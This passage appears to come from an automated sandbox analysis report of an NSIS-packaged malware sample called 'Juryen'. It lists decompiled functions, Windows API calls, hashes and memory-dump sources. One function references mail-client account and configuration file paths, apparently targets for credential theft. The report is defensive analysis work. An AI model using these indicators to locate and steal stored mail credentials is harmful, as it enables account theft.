                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                    • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                    • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                                    Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00403001
                                                                    • wsprintfW.USER32 ref: 00403011
                                                                    • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 0040300B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                    • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                                    • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                    • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                                    Function 1F758821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,1F756FFD,00000000,?,?,?,1F758A72,?,?,00000100), ref: 1F75887B
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,1F758A72,?,?,00000100,5EFC4D8B,?,?), ref: 1F758901
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1F7589FB
                                                                    • __freea.LIBCMT ref: 1F758A08
                                                                      • Part of subcall function 1F7556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F755702
                                                                    • __freea.LIBCMT ref: 1F758A11
                                                                    • __freea.LIBCMT ref: 1F758A36
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: ba0b9b9140ef209460f88bfadda2cd3989425718f1edbf4cc008d17e674b9f2b
                                                                    • Instruction ID: e2253af679d837169ea0f9c543d41f90351a0e13ede925cd58d5031069bac972
                                                                    • Opcode Fuzzy Hash: ba0b9b9140ef209460f88bfadda2cd3989425718f1edbf4cc008d17e674b9f2b
                                                                    • Instruction Fuzzy Hash: F551E472610216AFEB15CEB4DC84EAB77A9EB84764F114629FC14DA1A0EB35FC60C690
                                                                    Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                    • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: c2b671b088f8a2c6a2cc46e86308de55ebb46a294384aac1552312227abe31fd
                                                                    • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                                    • Opcode Fuzzy Hash: c2b671b088f8a2c6a2cc46e86308de55ebb46a294384aac1552312227abe31fd
                                                                    • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                                    Function 1F7515DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _strlen.LIBCMT ref: 1F751607
                                                                    • _strcat.LIBCMT ref: 1F75161D
                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1F75190E,?,?,00000000,?,00000000), ref: 1F751643
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,1F75190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1F75165A
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1F75190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 1F751661
                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1F75190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1F751686
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                    • String ID:
                                                                    • API String ID: 1922816806-0
                                                                    • Opcode ID: 6914022145c22245c6266c6623ee550ec61e81748cc4a1948c3635e40fcda2ef
                                                                    • Instruction ID: bd257018bccaab1c64222e43503574cdb30b29492b685df2e5a82db6d8957d07
                                                                    • Opcode Fuzzy Hash: 6914022145c22245c6266c6623ee550ec61e81748cc4a1948c3635e40fcda2ef
                                                                    • Instruction Fuzzy Hash: 6221C83AA00304ABDB04DF54FC84EFE77B8EF88721F24405BE504AB151EB74B94687A5
                                                                    Function 1F751000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 1F751038
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1F75104B
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1F751061
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 1F751075
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 1F751090
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 1F7510B8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                    • String ID:
                                                                    • API String ID: 3594823470-0
                                                                    • Opcode ID: 867eac5d386c9eb41514e1bf63a8ee01741721378089d990cefe19c925ba2365
                                                                    • Instruction ID: 155cc86afe94801da754fe4f8cf342070785205cc605e75adb760f50ce2504e1
                                                                    • Opcode Fuzzy Hash: 867eac5d386c9eb41514e1bf63a8ee01741721378089d990cefe19c925ba2365
                                                                    • Instruction Fuzzy Hash: EB21A33990036CABCF10DA60FC5CDDB3728EF84225F104296E859971B1DE70AA9ACB80
                                                                    Function 1F753856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,1F753518,1F7523F1,1F751F17), ref: 1F753864
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1F753872
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1F75388B
                                                                    • SetLastError.KERNEL32(00000000,?,1F753518,1F7523F1,1F751F17), ref: 1F7538DD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: ad47b8b0d2ca23c8d94430996c508fb55245329b21fc4d8e036b670a4a604ee8
                                                                    • Instruction ID: 4cc3daaba5cb4b5f7ddb85651a31dc14724bb82ad36956fd80dc2eb5d7e5fa8c
                                                                    • Opcode Fuzzy Hash: ad47b8b0d2ca23c8d94430996c508fb55245329b21fc4d8e036b670a4a604ee8
                                                                    • Instruction Fuzzy Hash: 5201D43760C7226EF6C91A797CD8E562B97DB89674F20022AE0209D1F0EF1378398360
                                                                    Function 1F755AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,1F756C6C), ref: 1F755AFA
                                                                    • _free.LIBCMT ref: 1F755B2D
                                                                    • _free.LIBCMT ref: 1F755B55
                                                                    • SetLastError.KERNEL32(00000000,?,?,1F756C6C), ref: 1F755B62
                                                                    • SetLastError.KERNEL32(00000000,?,?,1F756C6C), ref: 1F755B6E
                                                                    • _abort.LIBCMT ref: 1F755B74
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: 9323f90c8db8a43e008e06e03d9a69c0fc38665681b4f6991c4fffc6883808e7
                                                                    • Instruction ID: b5298c4e559fc8ee5d7549868acffcf1251ed53c53ccfefe301ef385e8c452fe
                                                                    • Opcode Fuzzy Hash: 9323f90c8db8a43e008e06e03d9a69c0fc38665681b4f6991c4fffc6883808e7
                                                                    • Instruction Fuzzy Hash: D4F0FC3A504761BBD20216347C4CE5E262B8FC9679F250225F818DA1B0FF25A41741A4
                                                                    Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 551687249-2449383134
                                                                    • Opcode ID: 05f4ba2d2f2a4a5dfa404d26d053dcd1f9bdf675e575ac8564198bce70fe1ccc
                                                                    • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                    • Opcode Fuzzy Hash: 05f4ba2d2f2a4a5dfa404d26d053dcd1f9bdf675e575ac8564198bce70fe1ccc
                                                                    • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9
                                                                    Function 1F7511EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 1F751E89: lstrlenW.KERNEL32(?,?,?,?,?,1F7510DF,?,?,?,00000000), ref: 1F751E9A
                                                                      • Part of subcall function 1F751E89: lstrcatW.KERNEL32(?,?,?,1F7510DF,?,?,?,00000000), ref: 1F751EAC
                                                                      • Part of subcall function 1F751E89: lstrlenW.KERNEL32(?,?,1F7510DF,?,?,?,00000000), ref: 1F751EB3
                                                                      • Part of subcall function 1F751E89: lstrlenW.KERNEL32(?,?,1F7510DF,?,?,?,00000000), ref: 1F751EC8
                                                                      • Part of subcall function 1F751E89: lstrcatW.KERNEL32(?,1F7510DF,?,1F7510DF,?,?,?,00000000), ref: 1F751ED3
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1F75122A
                                                                      • Part of subcall function 1F75173A: _strlen.LIBCMT ref: 1F751855
                                                                      • Part of subcall function 1F75173A: _strlen.LIBCMT ref: 1F751869
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                    • API String ID: 4036392271-1520055953
                                                                    • Opcode ID: bcba8523ab6b8b3a8b9022066d47e48fcbab880236bbc48ff6e0e9dca5de3813
                                                                    • Instruction ID: 7513ac45b3e12c6685c8930d5754538f43a2412873eb2621461be13e9cca5cff
                                                                    • Opcode Fuzzy Hash: bcba8523ab6b8b3a8b9022066d47e48fcbab880236bbc48ff6e0e9dca5de3813
                                                                    • Instruction Fuzzy Hash: 7821C3B9E103586AEB1097A0FC85FEE7339EF84B15F001556FA08EB1E0E6F12D858758
                                                                    Function 004067EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                    • CharNextW.USER32(?,00434000,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                    • CharPrevW.USER32(?,?,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":
                                                                    • API String ID: 589700163-165019052
                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                    • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                    • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                    Function 1F754B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,1F754AEA,?,?,1F754A8A,?,1F762238,0000000C,1F754BBD,00000000,00000000), ref: 1F754B59
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1F754B6C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,1F754AEA,?,?,1F754A8A,?,1F762238,0000000C,1F754BBD,00000000,00000000,00000001,1F752082), ref: 1F754B8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 01d511bb7bb04781009d78db253cb41523a7adceb0ce51738a62717239ecbf5f
                                                                    • Instruction ID: 37bfb58ca654532383d2ab50366e2927a6b1c0271f54e08b79bb034e318e46bb
                                                                    • Opcode Fuzzy Hash: 01d511bb7bb04781009d78db253cb41523a7adceb0ce51738a62717239ecbf5f
                                                                    • Instruction Fuzzy Hash: 34F06831A04218BFDB119F90CC68FDE7FB9EF48361F004159F809A6160EB359A66CA51
                                                                    Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                    • wsprintfW.USER32 ref: 00406917
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME
                                                                    • API String ID: 2200240437-1106614640
                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                    • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                    • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798
                                                                    Function 00401794 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000,0040A5C8,00435000,?,?,00000031), ref: 004017D5
                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A5C8,0040A5C8,00000000,00000000,0040A5C8,00435000,?,?,00000031), ref: 004017FA
                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(00421EE8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,00421EE8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                      • Part of subcall function 004055C6: lstrcatW.KERNEL32(00421EE8,00403412,00403412,00421EE8,00000000,?,00000000), ref: 00405621
                                                                      • Part of subcall function 004055C6: SetWindowTextW.USER32(00421EE8,00421EE8), ref: 00405633
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID:
                                                                    • API String ID: 1941528284-0
                                                                    • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                    • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                    • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                    • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D
                                                                    Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEnum$DeleteValue
                                                                    • String ID:
                                                                    • API String ID: 1354259210-0
                                                                    • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                    • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                                    • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                    • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                                    Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                    • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                    • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
